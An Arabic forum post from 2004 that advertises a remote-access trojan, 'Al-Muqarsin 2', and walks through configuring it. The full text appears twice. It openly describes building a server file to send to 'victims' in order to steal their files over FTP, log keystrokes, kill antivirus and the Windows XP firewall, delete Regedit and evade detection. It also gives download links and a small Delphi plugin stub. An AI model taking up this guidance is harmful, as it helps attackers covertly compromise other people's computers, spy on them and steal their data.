the loover
09-08-2004, 11:18 PM
والبرنامج في شباب كتير مجربينووووو
المبرمج : العقرب الأسود.
وظيفة البرنامج: ارسال الملفات من والى جهاز الضحية مع تصفح كامل لملفاته
بالاضافة بخيارات اخرى مثل الكيلوجر وغيرها .
حجم التروجان: 44 كيلو بايت تقريبا وبعد الضغط بالـ UPX يصبح 20 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و المميزات والتحسينات:
1- استخدام تقنية تخطي الشبكات وهذا اول برنامج عربي باعتقادي يستخدم لهذه التقنية
وهي تساعدك في اختراق اجهزة مقاهي الانترنت والجامعات او الشركات...الخ وانت خارج الشبكة.
2- عدم استخدام طريقة الـ S.I.N باعتماد على موقع no-ip.com في عملية تخطي الشبكات بل طريقة جديدة تسهل على المسخدم تخطي الشبكات وهذا اول برنامج عربي يستخدمها وايضا اول برنامج على مستوى البرامج الأجنبية باعتقادي تستخدم هذه الطريقة اذ ان جميع البرامج الأجنبية تعتمد على الـ S.I.N عن طريق موقع no-ip.com.
3- استخدام تقنية الملفات المساعدة بحيث تستطيع برمجة ملف مساعد بنفسك وارساله للضحية
وتشغيل الامر الذي به.
4- عمل الكثير من التعديلات البرمجية وحل بعض المشاكل البرمجية التي كانت في الاصدار الأول من البرنامج.
5- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
6- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
7- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
8- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
9- غير مكتشف من قبل برامج الحماية حتى الآن.
http://members.lycos.co.uk/bscorpion/almq22.jpg
شرح فكرة البرنامج:
فكرة البرنامج هي نقل الملفات من والى جهاز الضحية عن طريق موقع تضع فيه الملف الذي تريد ان تحمله الى جهاز الضحية ومن ثم تصدر امر التحميل اما بالنسبة لرفع ملف من جهاز الضحية الى جهازك فيتم ارسال الملف الى موقعك (حساب الـ FTP) عن طريق البيانات التي وضعتها في السيرفر بمعنى اخر لا يوجد اتصال مباشر بينك وبين الضحية اثناء نقل الملفات.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المقرصن2: وهو البرنامج الرئيسي.
file.php : وهو الملف الخاص بالتبليغ عن طريق ال PHP.
upx.exe : وهو برنامج لضغط الملفات.
اولا قم بفتح برنامج المقرصن2 ثم اضغط على اعدادات الخادم ثم اختر نوع الخادم الذي تريده وغير البيانات كما يلي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
المنفذ: اكتب اي منفذ يعجبك وينصح ان يكون المنفذ غير معروف (مشهور) غير معروف لكي لا يتعارض مع نفس المنفذ اذا كانت هناك برامج اخرى تستخدم نفس المنفذ.
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
قتل جدا النار الخاص لـ xp : هذا الخيار سوف يقوم بايقاف جدار النار الخاص بويندوز اكس بي.
حذف برنامج الـ Regedit.exe : هذا الخيار يقوم بحذف برنامج ال Regedit الذي يقوم بتصفح الرجستري.
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
الايقونة: اضغط على الزر ومن ثم اختر ايقونة السيرفر.
سيرفر الـ FTP : اكتب هنا سيرفر الـFTP الخاص لموقعك مثال لسيرفر الـ lycos:
ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للـ FTP لموقعك.
كلمة المرور: اكتب نا كلمة المرور الخاص للـ FTP لموقعك.
عنوان بريدك: اكتب بريدك كاملا مثلا : yourmail@hotmail.com
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجلد البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظات:
- عند الاتصال بالضحية تستطيع رؤية ملفاته عن طريق اختيار السواقة وتستطيع فتح المجلدات عن طريق الضغط مرتين على المجلد.
لرفع الملفات من والى جهاز الضحية اضغط على الملف او قائمة الملفات بالزر الايمن وسوف تظهر لك قائمة اختر منها الامر الذي تريد تنفيذه.
- عند الاتصال بالضحية لا تقم باصدار عدة اوامر في وقت واحد قم باصدار امر واحد ثم انتظر حتى ينتهي ومن ثم اصدر الامرالذي بعده.
-اثناء نقل الملفات لا تقم باصدار اي امر اخر حتى تظهر لك رسالة انهاء نقل الملف ومن بعدها اصدر الاوامر الاخرى.
- بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج مثال:
www.yoursite.com/file.php
وبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.html ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.html
www.yoursite.com/log.html
- اما بالنسبة للابلاغ عن طريق البريد لا انصح المستخدمين الاعتماد الكلي عليها.
- عند اعداد خادم للشبكات يجب ان يكون رابط الملف الذي يأخذ منه الخادم الايبي بهذا الشكل او
ما شابهه:
www.yoursite.com/ip.txt
بحيث تكتب في ملف ال Ip.txt ايبي جهازك فقط ولا تزيد عليه اي شئ وكل ما تدخل الانترنت غير الايبي الموجود في الملف لأن ايبيك سوف يتغير اذا كنت من مستخدمي الاتصال العادي.
- بالنسبة لخيار الانصات اختر رقم المنفذ الذي حددته في الخادم ثم اضغط على زر بدء الانصات
وتستطيع ان تتحكم باكثر من خادم يتصل بك في نفس الوقت كل ما عليك هو اختيار الايبي الموجود
في قائمة الايبيات المتصلة حتى تتحكم بالايبي المطلوب واكرر ذلك يجب عليك ان تختار الايبي الذي تريد ان تتحكم عليه لأنك لو لم تختر اي ايبي فلن ترسل الاوامر للخادم.
- بالنسبة لمن يريد عمل ملف مساعد خاص به يستخدمه مع الخادم فهذا مثال على الدلفي
سوف يفيد المبرمجين في ذلك:
كود PHP:
library Project1;
uses
windows;
procedure test; stdcall;
begin
messagebox(0,'anytext','your title',mb_ok);
end;
exports
test;
begin
end.
حيث يجب ان تكون اسم الاجرائية test لأن البرنامج مبرمج بهذا الاسم.
التحميل:
http://members.lycos.co.uk/bscorpion
www.bscorpion.cjb.net
المبرمج : العقرب الأسود.
وظيفة البرنامج: ارسال الملفات من والى جهاز الضحية مع تصفح كامل لملفاته
بالاضافة بخيارات اخرى مثل الكيلوجر وغيرها .
حجم التروجان: 44 كيلو بايت تقريبا وبعد الضغط بالـ UPX يصبح 20 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و المميزات والتحسينات:
1- استخدام تقنية تخطي الشبكات وهذا اول برنامج عربي باعتقادي يستخدم لهذه التقنية
وهي تساعدك في اختراق اجهزة مقاهي الانترنت والجامعات او الشركات...الخ وانت خارج الشبكة.
2- عدم استخدام طريقة الـ S.I.N باعتماد على موقع no-ip.com في عملية تخطي الشبكات بل طريقة جديدة تسهل على المسخدم تخطي الشبكات وهذا اول برنامج عربي يستخدمها وايضا اول برنامج على مستوى البرامج الأجنبية باعتقادي تستخدم هذه الطريقة اذ ان جميع البرامج الأجنبية تعتمد على الـ S.I.N عن طريق موقع no-ip.com.
3- استخدام تقنية الملفات المساعدة بحيث تستطيع برمجة ملف مساعد بنفسك وارساله للضحية
وتشغيل الامر الذي به.
4- عمل الكثير من التعديلات البرمجية وحل بعض المشاكل البرمجية التي كانت في الاصدار الأول من البرنامج.
5- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
6- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
7- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
8- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
9- غير مكتشف من قبل برامج الحماية حتى الآن.
http://members.lycos.co.uk/bscorpion/almq22.jpg
شرح فكرة البرنامج:
فكرة البرنامج هي نقل الملفات من والى جهاز الضحية عن طريق موقع تضع فيه الملف الذي تريد ان تحمله الى جهاز الضحية ومن ثم تصدر امر التحميل اما بالنسبة لرفع ملف من جهاز الضحية الى جهازك فيتم ارسال الملف الى موقعك (حساب الـ FTP) عن طريق البيانات التي وضعتها في السيرفر بمعنى اخر لا يوجد اتصال مباشر بينك وبين الضحية اثناء نقل الملفات.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المقرصن2: وهو البرنامج الرئيسي.
file.php : وهو الملف الخاص بالتبليغ عن طريق ال PHP.
upx.exe : وهو برنامج لضغط الملفات.
اولا قم بفتح برنامج المقرصن2 ثم اضغط على اعدادات الخادم ثم اختر نوع الخادم الذي تريده وغير البيانات كما يلي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
المنفذ: اكتب اي منفذ يعجبك وينصح ان يكون المنفذ غير معروف (مشهور) غير معروف لكي لا يتعارض مع نفس المنفذ اذا كانت هناك برامج اخرى تستخدم نفس المنفذ.
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
قتل جدا النار الخاص لـ xp : هذا الخيار سوف يقوم بايقاف جدار النار الخاص بويندوز اكس بي.
حذف برنامج الـ Regedit.exe : هذا الخيار يقوم بحذف برنامج ال Regedit الذي يقوم بتصفح الرجستري.
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
الايقونة: اضغط على الزر ومن ثم اختر ايقونة السيرفر.
سيرفر الـ FTP : اكتب هنا سيرفر الـFTP الخاص لموقعك مثال لسيرفر الـ lycos:
ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للـ FTP لموقعك.
كلمة المرور: اكتب نا كلمة المرور الخاص للـ FTP لموقعك.
عنوان بريدك: اكتب بريدك كاملا مثلا : yourmail@hotmail.com
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجلد البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظات:
- عند الاتصال بالضحية تستطيع رؤية ملفاته عن طريق اختيار السواقة وتستطيع فتح المجلدات عن طريق الضغط مرتين على المجلد.
لرفع الملفات من والى جهاز الضحية اضغط على الملف او قائمة الملفات بالزر الايمن وسوف تظهر لك قائمة اختر منها الامر الذي تريد تنفيذه.
- عند الاتصال بالضحية لا تقم باصدار عدة اوامر في وقت واحد قم باصدار امر واحد ثم انتظر حتى ينتهي ومن ثم اصدر الامرالذي بعده.
-اثناء نقل الملفات لا تقم باصدار اي امر اخر حتى تظهر لك رسالة انهاء نقل الملف ومن بعدها اصدر الاوامر الاخرى.
- بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج مثال:
www.yoursite.com/file.php
وبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.html ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.html
www.yoursite.com/log.html
- اما بالنسبة للابلاغ عن طريق البريد لا انصح المستخدمين الاعتماد الكلي عليها.
- عند اعداد خادم للشبكات يجب ان يكون رابط الملف الذي يأخذ منه الخادم الايبي بهذا الشكل او
ما شابهه:
www.yoursite.com/ip.txt
بحيث تكتب في ملف ال Ip.txt ايبي جهازك فقط ولا تزيد عليه اي شئ وكل ما تدخل الانترنت غير الايبي الموجود في الملف لأن ايبيك سوف يتغير اذا كنت من مستخدمي الاتصال العادي.
- بالنسبة لخيار الانصات اختر رقم المنفذ الذي حددته في الخادم ثم اضغط على زر بدء الانصات
وتستطيع ان تتحكم باكثر من خادم يتصل بك في نفس الوقت كل ما عليك هو اختيار الايبي الموجود
في قائمة الايبيات المتصلة حتى تتحكم بالايبي المطلوب واكرر ذلك يجب عليك ان تختار الايبي الذي تريد ان تتحكم عليه لأنك لو لم تختر اي ايبي فلن ترسل الاوامر للخادم.
- بالنسبة لمن يريد عمل ملف مساعد خاص به يستخدمه مع الخادم فهذا مثال على الدلفي
سوف يفيد المبرمجين في ذلك:
كود PHP:
library Project1;
uses
windows;
procedure test; stdcall;
begin
messagebox(0,'anytext','your title',mb_ok);
end;
exports
test;
begin
end.
حيث يجب ان تكون اسم الاجرائية test لأن البرنامج مبرمج بهذا الاسم.
التحميل:
http://members.lycos.co.uk/bscorpion
www.bscorpion.cjb.net